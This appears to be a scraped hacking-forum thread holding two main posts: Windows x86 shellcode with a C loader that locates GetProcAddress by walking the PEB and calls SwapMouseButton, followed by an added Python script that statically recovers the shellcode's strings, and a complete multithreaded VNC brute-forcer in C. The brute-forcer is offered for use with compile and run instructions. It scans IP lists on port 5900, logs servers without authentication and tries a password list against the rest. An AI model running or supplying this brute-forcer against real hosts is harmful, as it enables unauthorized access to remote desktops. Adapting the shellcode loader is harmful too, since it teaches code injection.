    - http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/
*/

/*
; Shellcode details
; -----------------

    xor ecx, ecx
    mov eax, fs:[ecx + 0x30]        ; EAX = PEB
    mov eax, [eax + 0xc]            ; EAX = PEB->Ldr
    mov esi, [eax + 0x14]           ; ESI = PEB->Ldr.InMemOrder
    lodsd                           ; EAX = Second module
    xchg eax, esi                   ; EAX = ESI, ESI = EAX
    lodsd                           ; EAX = Third(kernel32)
    mov ebx, [eax + 0x10]           ; EBX = Base address
    mov edx, [ebx + 0x3c]           ; EDX = DOS->e_lfanew
    add edx, ebx                    ; EDX = PE Header
    mov edx, [edx + 0x78]           ; EDX = Offset export table
    add edx, ebx                    ; EDX = Export table
    mov esi, [edx + 0x20]           ; ESI = Offset namestable
    add esi, ebx                    ; ESI = Names table
    xor ecx, ecx                    ; ECX = 0

Get_Function:

    inc ecx                         ; Increment the ordinal
    lodsd                           ; Get name offset
    add eax, ebx                    ; Get function name
    cmp dword ptr[eax], 0x50746547  ; GetP
    jnz Get_Function
    cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA
    jnz Get_Function
    cmp dword ptr[eax + 0x8], 0x65726464 ; ddre
    jnz Get_Function
    mov esi, [edx + 0x24]           ; ESI = Offset ordinals
    add esi, ebx                    ; ESI = Ordinals table
    mov cx, [esi + ecx * 2]         ; Number of function
    dec ecx
    mov esi, [edx + 0x1c]           ; Offset address table
    add esi, ebx                    ; ESI = Address table
    mov edx, [esi + ecx * 4]        ; EDX = Pointer(offset)
    add edx, ebx                    ; EDX = GetProcAddress

    xor ecx, ecx                    ; ECX = 0
    push ebx                        ; Kernel32 base address
    push edx                        ; GetProcAddress
    push ecx                        ; 0
    push 0x41797261                 ; aryA
    push 0x7262694c                 ; Libr
    push 0x64616f4c                 ; Load
    push esp                        ; "LoadLibrary"
    push ebx                        ; Kernel32 base address
    call edx                        ; GetProcAddress(LL)

    add esp, 0xc                    ; pop "LoadLibrary"
    pop ecx                         ; ECX = 0
    push eax                        ; EAX = LoadLibrary
    push ecx
    mov cx, 0x6c6c                  ; ll
    push ecx
    push 0x642e3233                 ; 32.d
    push 0x72657375                 ; user
    push esp                        ; "user32.dll"
    call eax                        ; LoadLibrary("user32.dll")

    add esp, 0x10                   ; Clean stack
    mov edx, [esp + 0x4]            ; EDX = GetProcAddress
    xor ecx, ecx                    ; ECX = 0
    push ecx
    mov ecx, 0x616E6F74             ; tona
    push ecx
    sub dword ptr[esp + 0x3], 0x61  ; Remove "a"
    push 0x74754265                 ; eBut
    push 0x73756F4D                 ; Mous
    push 0x70617753                 ; Swap
    push esp                        ; "SwapMouseButton"
    push eax                        ; user32.dll address
    call edx                        ; GetProc(SwapMouseButton)

    add esp, 0x14                   ; Cleanup stack
    xor ecx, ecx                    ; ECX = 0
    inc ecx                         ; true
    push ecx                        ; 1
    call eax                        ; Swap!

    add esp, 0x4                    ; Clean stack
    pop edx                         ; GetProcAddress
    pop ebx                         ; kernel32.dll base address
    mov ecx, 0x61737365             ; essa
    push ecx
    sub dword ptr [esp + 0x3], 0x61 ; Remove "a"
    push 0x636f7250                 ; Proc
    push 0x74697845                 ; Exit
    push esp
    push ebx                        ; kernel32.dll base address
    call edx                        ; GetProc(Exec)

    xor ecx, ecx                    ; ECX = 0
    push ecx                        ; Return code = 0
    call eax                        ; ExitProcess
*/

#include "stdafx.h"
#include <string.h>
#include <Windows.h>

int main()
{
    char *shellcode =
        "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
        "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75"
        "\xE2\x8B\x72\x24\x03\xF3\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x33\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68"
        "\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C\x51\x68\x33\x32\x2E\x64\x68\x75\x73"
        "\x65\x72\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24\x04\x33\xC9\x51\xB9\x74\x6F\x6E\x61\x51\x83\x6C\x24\x03\x61\x68\x65\x42\x75\x74\x68"
        "\x4D\x6F\x75\x73\x68\x53\x77\x61\x70\x54\x50\xFF\xD2\x83\xC4\x14\x33\xC9"
        "\x41" // inc ecx - Remove this to restore the functionality
        "\x51\xFF\xD0\x83\xC4\x04\x5A\x5B\xB9\x65\x73\x73\x61"
        "\x51\x83\x6C\x24\x03\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\x53\xFF\xD2\x33\xC9\x51\xFF\xD0";

    // Set memory as executable
    DWORD old = 0;
    BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old);

    // Call the shellcode
    __asm
    {
        jmp shellcode;
    }

    return 0;
}
    1 point
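An added analysis example, not part of Ionut's post or the securitycafe.ro articles: the script below walks the shellcode bytes printed above and recovers, without executing anything, the strings it builds on the stack (the push imm32 / mov ecx / push ecx / sub [esp+3] idiom) and the export-name fragments it compares against, which is what an analyst wants to pull from a sample like this. It decodes only the instruction forms this particular shellcode uses and tracks only ECX; both are assumptions stated in the comments, and a real sample would need a proper disassembler.

```python
# Added analysis helper (not from the original post): recover the stack-built
# strings and the export-name compare from the SwapMouseButton shellcode above.
# Assumptions: only the x86 instruction forms this shellcode uses are decoded,
# and only ECX is tracked (the one register it pushes as string data).
SHELLCODE = bytes.fromhex(                      # bytes exactly as printed in the post
    "33c9648b41308b400c8b7014ad96ad8b58108b533c03d38b527803d38b722003"
    "f333c941ad03c381384765745075f4817804726f634175eb8178086464726575"
    "e28b722403f3668b0c4e498b721c03f38b148e03d333c9535251686172794168"
    "4c696272684c6f61645453ffd283c40c59505166b96c6c516833322e64687573"
    "657254ffd083c4108b54240433c951b9746f6e6151836c240361686542757468"
    "4d6f757368537761705450ffd283c41433c9"
    "41"                                        # the inc ecx the post says to remove
    "51ffd083c4045a5bb965737361"
    "51836c2403616850726f6368457869745453ffd233c951ffd0"
)


def modrm_len(code, i):
    """Size of the ModRM byte at code[i] plus its SIB byte and displacement."""
    mod, rm = code[i] >> 6, code[i] & 7
    n = 1 + (mod != 3 and rm == 4)              # SIB byte present?
    return n + {1: 1, 2: 4}.get(mod, 4 if mod == 0 and rm == 5 else 0)


def recover_strings(code):
    """Linear sweep; returns (stack strings in build order, compared name prefix)."""
    stack, strings, compares = [], [], {}       # stack: 4-byte chunks, last = top
    ecx, i = 0, 0                               # ecx None means "value unknown"
    while i < len(code):
        opsize16 = False
        while code[i] in (0x64, 0x66):          # fs: and operand-size prefixes
            opsize16 |= code[i] == 0x66
            i += 1
        op = code[i]
        if op in (0x03, 0x33, 0x8B, 0xFF):      # add / xor / mov / call r/m32
            modrm = code[i + 1]
            if op == 0x33 and modrm == 0xC9:    # xor ecx, ecx
                ecx = 0
            elif op == 0x8B and (modrm >> 3) & 7 == 1:
                ecx = None                      # mov (e)cx, [mem]: not modelled
            i += 1 + modrm_len(code, i + 1)
        elif op == 0x81:                        # cmp dword [eax+disp], imm32
            modrm, n = code[i + 1], modrm_len(code, i + 1)
            if (modrm >> 3) & 7 == 7 and modrm & 7 == 0:
                disp = code[i + 2] if modrm >> 6 == 1 else 0
                compares[disp] = bytes(code[i + 1 + n:i + 5 + n])
            i += 1 + n + 4
        elif op == 0x83:                        # add esp, imm8 / sub dword [esp+d], imm8
            n = modrm_len(code, i + 1)
            if code[i + 1] == 0x6C and code[i + 2] == 0x24 and stack:
                d, imm8 = code[i + 3], code[i + 1 + n]
                stack[-1][d] = (stack[-1][d] - imm8) & 0xFF   # patch one byte of top chunk
            i += 1 + n + 1
        elif op == 0x68:                        # push imm32: 4 bytes of a string
            stack.append(bytearray(code[i + 1:i + 5]))
            i += 5
        elif op == 0xB9:                        # mov ecx, imm32 / mov cx, imm16
            width = 2 if opsize16 else 4
            imm = int.from_bytes(code[i + 1:i + 1 + width], "little")
            ecx = imm if width == 4 else ((ecx or 0) & 0xFFFF0000) | imm
            i += 1 + width
        elif op == 0x51:                        # push ecx (a zero acts as terminator)
            stack.append(bytearray(b"????" if ecx is None else ecx.to_bytes(4, "little")))
            i += 1
        elif op == 0x54:                        # push esp: the string is complete
            raw = b"".join(reversed(stack))     # top of stack is the first byte
            strings.append(raw.split(b"\0", 1)[0].decode("latin-1"))
            stack.clear()
            i += 1
        elif 0x40 <= op <= 0x5F or op in (0xAD, 0x96):   # inc/dec/push/pop, lodsd, xchg
            if op in (0x41, 0x49) and ecx is not None:   # inc ecx / dec ecx
                ecx = (ecx + (1 if op == 0x41 else -1)) & 0xFFFFFFFF
            elif op == 0x59:                    # pop ecx: the stack is not emulated
                ecx = None
            elif op in (0x50, 0x52, 0x53):      # push eax/edx/ebx: untracked data
                stack.append(bytearray(b"????"))
            i += 1
        elif 0x70 <= op <= 0x7F:                # jcc rel8 (sweep does not follow it)
            i += 2
        else:
            raise ValueError("opcode %#x at offset %d not handled" % (op, i))
    name = b"".join(compares[d] for d in sorted(compares)).decode("latin-1")
    return strings, name
```

Running `recover_strings(SHELLCODE)` yields LoadLibraryA, user32.dll, SwapMouseButton and ExitProcess, and shows that the export-name loop only ever compares the first 12 bytes, "GetProcAddre", which is the kind of detail a signature writer wants.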
  17. I wanted to make a VNC brute-forcer, because from what I've seen on the net, I haven't found a very fast one. Usage is simple: you need openssl installed and you compile it with gcc -o vnc vnc.c -lcrypto -lpthread.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <openssl/des.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <pthread.h>
#include <ctype.h>

#define RED "\E[1;32;31m"
#define GREEN "\E[1;32;40m"
#define WHITE "\E[1;37;40m"
#define NORMAL "\E[m"
#define CLEARLN "\033[F\033[J"
#define CONNECT_TIMEOUT 2
#define READ_TIMEOUT 5
#define LOCK(x) pthread_mutex_lock(&x);
#define UNLOCK(x) pthread_mutex_unlock(&x);

static int maxqueue = 0;
static int brutemode = 0;

struct host_queue {
    char *host;
    char *pass;
    struct host_queue *next;
};

struct combi {
    char *host;
    char *pass;
};

static time_t start, lmin;
static FILE *ipfile = NULL;
static FILE *outfile = NULL;
static FILE *passfile = NULL;
static int finished = 0;
static int done = 0;
static int good = 0;
static int total = 0;
static long qsize = 0;
static long lastmin = 0;
static int dmin = 0;
static struct host_queue *jobs = NULL;
static pthread_mutex_t stat_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t job_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t job_cond = PTHREAD_COND_INITIALIZER;
static pthread_cond_t job_size_cond = PTHREAD_COND_INITIALIZER;

static void usage(const char *s)
{
    printf(RED"Usage: %s <check|brute>\n"NORMAL, s);
    exit(EXIT_SUCCESS);
}

static void usage_check(const char *s)
{
    printf(RED"Usage: %s check <vnc list> <threads>\n"NORMAL, s);
    exit(EXIT_SUCCESS);
}

static void usage_brute(const char *s)
{
    printf(RED"Usage: %s brute <vnc list> <passfile> <threads>\n"NORMAL, s);
    exit(EXIT_SUCCESS);
}

static void save_no_auth(const char *host)
{
    FILE *noauth = fopen("no.auth", "a+");
    fprintf(noauth, "%s\n", host);
    fclose(noauth);
}

static void save_vnc_list(const char *host)
{
    FILE *vnclist = fopen("vnc.list", "a+");
    fprintf(vnclist, "%s\n", host);
    fclose(vnclist);
}

static void queue_job(char *h, char *p)
{
    struct host_queue *hq = (struct host_queue *) malloc(sizeof(struct host_queue));
    hq->host = h;
    hq->pass = p;
    hq->next = NULL;
    LOCK(job_lock);
    while (qsize >= maxqueue)
        pthread_cond_wait(&job_size_cond, &job_lock);
    if (jobs == NULL)
        jobs = hq;
    else {
        hq->next = jobs;
        jobs = hq;
    }
    ++qsize;
    pthread_cond_signal(&job_cond);
    UNLOCK(job_lock);
}

static struct combi *dequeue_job(void)
{
    struct combi *trynow = (struct combi *) malloc(sizeof(struct combi));
    LOCK(job_lock);
    while (jobs == NULL) {
        LOCK(stat_lock);
        if (done == 1) {
            UNLOCK(stat_lock);
            UNLOCK(job_lock);
            free(trynow);
            return NULL;
        }
        UNLOCK(stat_lock);
        pthread_cond_wait(&job_cond, &job_lock);
    }
    trynow->host = jobs->host;
    trynow->pass = jobs->pass;
    struct host_queue *hq = jobs;
    jobs = jobs->next;
    --qsize;
    pthread_cond_signal(&job_size_cond);
    UNLOCK(job_lock);
    free(hq);
    return trynow;
}

static int send_msg(int sockfd, char *message)
{
    int n;
    fd_set rset;
    struct timeval timeout;
    FD_ZERO(&rset);
    FD_SET(sockfd, &rset);
    timeout.tv_sec = READ_TIMEOUT;
    timeout.tv_usec = 0;
    n = select(sockfd + 1, NULL, &rset, NULL, &timeout);
    if (n < 0)
        return -1;
    else if (n == 0)
        return -1;
    else
        n = send(sockfd, message, strlen(message), MSG_NOSIGNAL);
    return n;
}

static int recv_msg(int sockfd, char **retmes)
{
    int n;
    char *buffer = (char *) malloc(512);
    bzero(buffer, 512);
    *retmes = NULL;
    fd_set rset;
    struct timeval timeout;
    FD_ZERO(&rset);
    FD_SET(sockfd, &rset);
    timeout.tv_sec = READ_TIMEOUT;
    timeout.tv_usec = 0;
    n = select(sockfd + 1, &rset, NULL, NULL, &timeout);
    if (n <= 0) {
        free(buffer);
        return 0;
    } else
        n = read(sockfd, buffer, 511);
    *retmes = buffer;
    return n;
}

static char *Encrypt(char *Key, char *Msg, int size, char **dest)
{
    char *Res = NULL;
    int n = 0;
    DES_cblock Key2, decry, plain1, plain2, result1, result2;
    DES_key_schedule schedule;
    Res = (char *) malloc(size + 1);
    bzero(Res, size + 1);
    memcpy(Key2, Key, 8);
    memcpy(plain1, Msg, 8);
    memcpy(plain2, Msg + 8, 8);
    DES_set_odd_parity(&Key2);
    DES_set_key(&Key2, &schedule);
    DES_ecb_encrypt(&plain1, &result1, &schedule, DES_ENCRYPT);
    DES_ecb_encrypt(&plain2, &result2, &schedule, DES_ENCRYPT);
    memcpy(Res, result1, 8);
    memcpy(Res + 8, result2, 8);
    *dest = Res;
    return NULL;
}

static int checknow(const char *host, const char *pass)
{
    int sockfd, rc, i, n = 0, tmax = 0;
    long arg;
    unsigned char newkey[8];
    bzero(newkey, 8);
    for (i = 0; i < strlen(pass); i++) {
        int a = pass[i];
        int b = 0;
        int j;
        for (j = 0; j < 8; j++)
            if (a & (1 << j))
                b = b | (1 << 7 - j);
        unsigned char d = b;
        newkey[i] = d;
    }
    newkey[i] = '\0';
    struct sockaddr_in remoteaddr;
    remoteaddr.sin_family = AF_INET;
    remoteaddr.sin_addr.s_addr = inet_addr(host);
    remoteaddr.sin_port = htons(5900);
retry:
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    arg = fcntl(sockfd, F_GETFL, NULL);
    arg |= O_NONBLOCK;
    fcntl(sockfd, F_SETFL, arg);
    if (sockfd < 0)
        goto retry;
    struct linger so_linger;
    so_linger.l_onoff = 1;
    so_linger.l_linger = 0;
    struct timeval tv;
    int valopt;
    tv.tv_sec = CONNECT_TIMEOUT;
    tv.tv_usec = 0;
    if (setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &so_linger, sizeof so_linger) > 0) {
        close(sockfd);
        goto retry;
    }
    if (setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv))) {
        close(sockfd);
        goto retry;
    }
    if (setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) {
        close(sockfd);
        goto retry;
    }
    char *recbuf = NULL;
    if (connect(sockfd, (struct sockaddr *) &remoteaddr, sizeof(remoteaddr)) < 0) {
        if (errno == EINPROGRESS) {
            fd_set write_fds;
            memset(&write_fds, 0, sizeof(write_fds));
            FD_ZERO(&write_fds);
            FD_SET(sockfd, &write_fds);
            if (select(sockfd + 1, NULL, &write_fds, NULL, &tv) > 0) {
                socklen_t lon;
                lon = sizeof(int);
                getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void *) (&valopt), &lon);
                if (valopt)
                    goto first;
            } else
                goto first;
        } else
            goto first;
    }
    n = recv_msg(sockfd, &recbuf);
    if (n == 0 || !strstr(recbuf, "RFB 00") || n > 12)
        goto first;
    char *proto = malloc(13 * sizeof(char));
    bzero(proto, 13);
    if ((recbuf[6] == '3' && recbuf[10] == '8') || (recbuf[6] == '4' && recbuf[10] == '1'))
        sprintf(proto, "RFB 003.008\n");
    else if (recbuf[6] == '3' && recbuf[10] == '7')
        sprintf(proto, "RFB 003.007\n");
    else
        sprintf(proto, "RFB 003.003\n");
    if (send_msg(sockfd, proto) < 0) {
        free(proto);
        goto first;
    }
    free(recbuf);
    n = recv_msg(sockfd, &recbuf);
    if (n == 0) {
        free(proto);
        goto first;
    }
    unsigned char *response = malloc(17 * sizeof(char));
    bzero(response, 17);
    int code;
    if (proto[10] == '7' || proto[10] == '8') {
        free(proto);
        int numberauth = recbuf[0], auth_supported = 0;
        for (i = 1; i < numberauth + 1; i++) {
            if (recbuf[i] == 1)
                save_no_auth(host);
            else if (recbuf[i] == 2)
                auth_supported = 1;
        }
        if (auth_supported == 0) {
            free(response);
            goto first;
        }
        if (brutemode == 1) {
            LOCK(stat_lock);
            good++;
            UNLOCK(stat_lock);
            long lpassed = time(0) - lmin;
            if (lpassed == 60) {
                LOCK(stat_lock);
                lastmin = dmin / lpassed;
                dmin = 0;
                lmin = time(0);
                UNLOCK(stat_lock);
            }
            long passed = time(0) - start;
            printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed);
            LOCK(stat_lock);
            save_vnc_list(host);
            UNLOCK(stat_lock);
            tmax = 3;
            free(response);
            goto first;
        }
        char authchar[1];
        authchar[0] = '\x02';
        if (send_msg(sockfd, authchar) < 0) {
            free(response);
            goto first;
        }
        free(recbuf);
        n = recv_msg(sockfd, &recbuf);
        if (n != 16) {
            free(response);
            goto first;
        }
        memcpy(response, recbuf, 16);
    } else {
        free(proto);
        code = recbuf[3];
        if (code == 1) {
            save_no_auth(host);
            free(response);
            goto first;
        } else if (code == 2 && n >= 20) {
            if (brutemode == 1) {
                LOCK(stat_lock);
                good++;
                UNLOCK(stat_lock);
                long lpassed = time(0) - lmin;
                if (lpassed == 60) {
                    LOCK(stat_lock);
                    lastmin = dmin / lpassed;
                    dmin = 0;
                    lmin = time(0);
                    UNLOCK(stat_lock);
                }
                long passed = time(0) - start;
                printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed);
                LOCK(stat_lock);
                save_vnc_list(host);
                UNLOCK(stat_lock);
                free(response);
                tmax = 3;
                goto first;
            }
            memcpy(response, recbuf + n - 16, 16);
        } else {
            free(response);
            goto first;
        }
    }
    char *encrypted = NULL;
    Encrypt(newkey, response, 16, &encrypted);
    free(response);
    free(recbuf);
    if (send_msg(sockfd, encrypted) < 0) {
        free(encrypted);
        goto first;
    }
    free(encrypted);
    n = recv_msg(sockfd, &recbuf);
    if (n != 4)
        goto first;
    code = recbuf[3];
    long lpassed = time(0) - lmin;
    if (lpassed == 60) {
        LOCK(stat_lock);
        lastmin = dmin / lpassed;
        dmin = 0;
        lmin = time(0);
        UNLOCK(stat_lock);
    }
    long passed = time(0) - start;
    printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed);
    if (code == 0) {
        LOCK(stat_lock);
        printf(CLEARLN""GREEN"[+] Valid: %s: %s\n\n"NORMAL, host, pass);
        FILE *logfile = fopen("vnc.good", "a+");
        fprintf(logfile, "%s %s\n", host, pass);
        fclose(logfile);
        UNLOCK(stat_lock);
    }
first:
    LOCK(stat_lock);
    dmin++;
    finished++;
    UNLOCK(stat_lock);
    free(recbuf);
    close(sockfd);
    return -1;
}

static void *worker_thread(void *worker)
{
    while (1) {
        struct combi *trynow = dequeue_job();
        if (trynow == NULL)
            break;
        char *host = NULL, *pass = NULL;
        host = trynow->host;
        pass = trynow->pass;
        if (host == NULL || pass == NULL)
            break;
        checknow(host, pass);
        free(trynow);
        free(host);
        if (brutemode == 2)
            free(pass);
    }
    pthread_exit(NULL);
}

int main(int argc, char **argv)
{
    char ip[32] = {0}, pass[32] = {0};
    if (argc < 2)
        usage(argv[0]);
    if ((strcmp(argv[1], "check") == 0) && (argc != 4))
        usage_check(argv[0]);
    else if ((strcmp(argv[1], "brute") == 0) && (argc != 5))
        usage_brute(argv[0]);
    else if (strcmp(argv[1], "check") != 0 && strcmp(argv[1], "brute") != 0)
        usage(argv[0]);
    if (strcmp(argv[1], "check") == 0)
        brutemode = 1;
    else if (strcmp(argv[1], "brute") == 0)
        brutemode = 2;
    int num_threads;
    char *list_host = NULL, *list_pass = NULL;
    if (brutemode == 1) {
        list_host = argv[2];
        num_threads = atoi(argv[3]);
    } else {
        list_host = argv[2];
        list_pass = argv[3];
        num_threads = atoi(argv[4]);
    }
    maxqueue = num_threads;
    if (brutemode == 2)
        printf(WHITE"[*] IP List: %s Passwords: %s Threads: %d Log: vnc.good\n\n"NORMAL, list_host, list_pass, num_threads);
    else
        printf(WHITE"[*] IP List: %s Threads: %d Log: vnc.list\n\n"NORMAL, list_host, num_threads);
    start = time(0);
    lmin = time(0);
    if (!(ipfile = fopen(list_host, "r"))) {
        printf("INVALID IP FILE: %s\n", argv[1]);
        exit(0);
    }
    fclose(ipfile);
    char **passwords;
    int pcount = 0;
    if (brutemode == 2) {
        if (!(passfile = fopen(list_pass, "r"))) {
            printf("INVALID PASSWORDS FILE: %s\n", argv[3]);
            exit(0);
        }
        fclose(passfile);
        passfile = fopen(list_pass, "r");
        while (1) {
            if (!fgets((char *) &pass, sizeof(pass), passfile))
                break;
            if (pass[strlen(pass) - 1] == '\n')
                pass[strlen(pass) - 1] = '\0';
            if (pass != NULL)
                pcount++;
        }
        fclose(passfile);
        passwords = malloc(pcount * sizeof(char *));
        pcount = 0;
        passfile = fopen(list_pass, "r");
        while (1) {
            if (!fgets((char *) &pass, sizeof(pass), passfile))
                break;
            if (pass[strlen(pass) - 1] == '\n')
                pass[strlen(pass) - 1] = '\0';
            if (pass != NULL) {
                passwords[pcount] = malloc((strlen(pass) + 1) * sizeof(char));
                strcpy(passwords[pcount], pass);
                pcount++;
            }
        }
        fclose(passfile);
    }
    int i;
    pthread_t *thread = (pthread_t *) malloc(sizeof(pthread_t) * num_threads);
    pthread_attr_t attrs;
    pthread_attr_init(&attrs);
    pthread_attr_setdetachstate(&attrs, PTHREAD_CREATE_DETACHED);
    for (i = 0; i < num_threads; i++) {
        pthread_create(&thread[i], &attrs, worker_thread, NULL);
        pthread_detach(thread[i]);
    }
    if (brutemode == 1) {
        ipfile = fopen(list_host, "r");
        while (1) {
            if (!fgets((char *) &ip, sizeof(ip), ipfile))
                break;
            if (ip[strlen(ip) - 1] == '\n')
                ip[strlen(ip) - 1] = '\0';
            if (ip != NULL) {
                char *host = (char *) malloc(strlen(ip) + 1);
                strcpy(host, ip);
                queue_job(host, "checkmod");
            }
        }
        fclose(ipfile);
    } else {
        int pc = 0;
        for (pc = 0; pc < pcount; pc++) {
            printf(CLEARLN""WHITE"[+]Working now with: %s\n\n"NORMAL, passwords[pc]);
            ipfile = fopen(list_host, "r");
            while (1) {
                if (!fgets((char *) &ip, sizeof(ip), ipfile))
                    break;
                if (ip[strlen(ip) - 1] == '\n')
                    ip[strlen(ip) - 1] = '\0';
                if (ip != NULL) {
                    char *host = (char *) malloc(strlen(ip) + 1);
                    char *pass = (char *) malloc(strlen(passwords[pc]) + 1);
                    strcpy(host, ip);
                    strcpy(pass, passwords[pc]);
                    queue_job(host, pass);
                }
            }
            fclose(ipfile);
        }
    }
    done = 1;
    for (i = 0; i < num_threads; i++)
        pthread_cond_signal(&job_cond);
    pthread_mutex_destroy(&job_lock);
    pthread_cond_destroy(&job_cond);
    sleep(20);
    free(thread);
    exit(0);
}

If you have a list of IPs and just want to check which ones have VNC and support authentication, run: ./vnc check listaipuri numarthreaduri (IP list, number of threads)
If you want to brute-force directly: ./vnc brute listaipuri listaparole numarthreaduri (IP list, password list, number of threads)
If you find any bug or have suggestions for improvement, leave a message
    1 point
  18. is this him? https://rstforums.com/forum/profile/16455-thejudger/content/ I haven't heard of him.
    -1 points